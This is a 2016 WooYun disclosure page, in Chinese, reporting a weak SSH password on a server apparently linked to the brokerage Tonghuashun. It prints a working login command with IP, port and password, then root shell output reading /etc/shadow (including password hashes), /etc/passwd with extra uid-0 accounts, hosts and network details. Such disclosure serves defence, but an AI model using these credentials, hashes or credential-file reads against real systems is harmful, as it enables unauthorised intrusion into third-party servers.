当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0198112

漏洞标题:疑似同花顺某服务器SSH弱口令漏洞

相关厂商:同花顺

漏洞作者: 路人甲

提交时间:2016-04-19 12:00

修复时间:2016-06-03 14:20

公开时间:2016-06-03 14:20

漏洞类型:应用配置错误

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-19: 细节已通知厂商并且等待厂商处理中
2016-04-19: 厂商已经确认,细节仅向厂商公开
2016-04-29: 细节向核心白帽子及相关领域专家公开
2016-05-09: 细节向普通白帽子公开
2016-05-19: 细节向实习白帽子公开
2016-06-03: 细节向公众公开

简要描述:

一日跟女朋友约会,趁着等女朋友的空档,在桥底下买了张黄盘,跟那中年男子砍价,成交,揣在大衣兜里。晚上去女朋友家吃饭,初次见未来的岳父母,一直不敢抬头,女朋友调笑:“怎么啦?平时也没见你这么腼腆啊。”我小声嘟囔:“我也没想到你爸爸卖光盘的啊!”

详细说明:

可能不是你们的,但是感觉绑定的host都是你们同花顺的,我想没有谁那么蛋疼需要用服务器来看你们同花顺的网站吧,或许是一个采集你们网站的一个服务器。
find搜索出来的文件太杂了,不好确定是不是你们的服务器。
ssh test@111.75.208.109 -p 9522    密码000000


[root@localhost /]# cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1		localhost.localdomain localhost
::1		localhost6.localdomain6 localhost6
183.131.12.246 info.10jqka.com.cn info.10jqka.com.cn
183.131.12.246 fund.10jqka.com.cn fund.10jqka.com.cn
183.131.12.179 update.10jqka.com.cn update.10jqka.com.cn
60.191.17.84 www.10jqka.com.cn www.10jqka.com.cn
183.131.12.185 wapinfo.10jqka.com.cn wapinfo.10jqka.com.cn
绑定的全部是你们的网站


[root@localhost etc]# cat /etc/shadow
root:$1$vg4QA9I9$d6xl36KAksHoBG.R7UQ9Z1:16827:0:99999:7:::
bin:*:16125:0:99999:7:::
daemon:*:16125:0:99999:7:::
adm:*:16125:0:99999:7:::
lp:*:16125:0:99999:7:::
sync:*:16125:0:99999:7:::
shutdown:*:16125:0:99999:7:::
halt:*:16125:0:99999:7:::
mail:*:16125:0:99999:7:::
news:*:16125:0:99999:7:::
uucp:*:16125:0:99999:7:::
operator:*:16125:0:99999:7:::
games:*:16125:0:99999:7:::
gopher:*:16125:0:99999:7:::
ftp:*:16125:0:99999:7:::
nobody:*:16125:0:99999:7:::
nscd:!!:16125:0:99999:7:::
vcsa:!!:16125:0:99999:7:::
rpc:!!:16125:0:99999:7:::
mailnull:!!:16125:0:99999:7:::
smmsp:!!:16125:0:99999:7:::
pcap:!!:16125:0:99999:7:::
ntp:!!:16125:0:99999:7:::
dbus:!!:16125:0:99999:7:::
avahi:!!:16125:0:99999:7:::
sshd:!!:16125:0:99999:7:::
rpcuser:!!:16125:0:99999:7:::
nfsnobody:!!:16125:0:99999:7:::
haldaemon:!!:16125:0:99999:7:::
avahi-autoipd:!!:16125:0:99999:7:::
xfs:!!:16125:0:99999:7:::
sabayon:!!:16125:0:99999:7:::
apache:!!:16125::::::
mysql:!!:16125::::::
rot:$1$jqz4J8c2$R8ellZ6zxB/8rTp07jnXU/:16281:0:99999:7:::
rooot:!!:16281:0:99999:7:::
test:$1$HFP.POle$pp6Xlf/.mDtiFLE2zV8y..:16283:0:99999:7:::
openvpn:!!:16542::::::
www:!!:16537:0:99999:7:::


[root@localhost etc]# cat /proc/version
Linux version 2.6.18-164.el5 (mockbuild@x86-002.build.bos.redhat.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Tue Aug 18 15:51:54 EDT 2009
[root@localhost etc]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:0:0:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
rot:x:0:0::/home/rot:/bin/bash
rooot:x:501:501::/home/rooot:/bin/bash
test:x:0:0::/home/test:/bin/bash
openvpn:x:101:102:OpenVPN:/etc/openvpn:/sbin/nologin
www:x:502:503::/home/www:/bin/bash


[root@localhost etc]# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1B:78:76:B2:F8
          inet addr:192.168.6.7  Bcast:192.168.6.255  Mask:255.255.255.0
          inet6 addr: fe80::21b:78ff:fe76:b2f8/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:798685 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2748749 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:303459053 (289.4 MiB)  TX bytes:291098026 (277.6 MiB)
          Interrupt:185 Memory:f8000000-f8012800
eth1      Link encap:Ethernet  HWaddr 00:1B:78:76:B2:F6
          inet addr:10.1.1.109  Bcast:10.1.1.255  Mask:255.255.255.0
          inet6 addr: fe80::21b:78ff:fe76:b2f6/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:27456338 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5070187 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2345750264 (2.1 GiB)  TX bytes:455391910 (434.2 MiB)
          Interrupt:82 Memory:fa000000-fa012800
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:14569870 errors:0 dropped:0 overruns:0 frame:0
          TX packets:14569870 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:1165508548 (1.0 GiB)  TX bytes:1165508548 (1.0 GiB)

漏洞证明:

[root@localhost etc]# cat /proc/version
Linux version 2.6.18-164.el5 (mockbuild@x86-002.build.bos.redhat.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Tue Aug 18 15:51:54 EDT 2009
[root@localhost etc]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:0:0:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
rot:x:0:0::/home/rot:/bin/bash
rooot:x:501:501::/home/rooot:/bin/bash
test:x:0:0::/home/test:/bin/bash
openvpn:x:101:102:OpenVPN:/etc/openvpn:/sbin/nologin
www:x:502:503::/home/www:/bin/bash

修复方案:

1.改密码;
2.查日志;
3.EQ空中吊打程序员。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-19 14:19

厂商回复:

你好,漏洞已确认,正在进行处理,谢谢。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-04-19 12:52 | Mark0smith ( 普通白帽子 | Rank:172 漏洞数:68 | 我要是再正常一点就好了)

    段子不错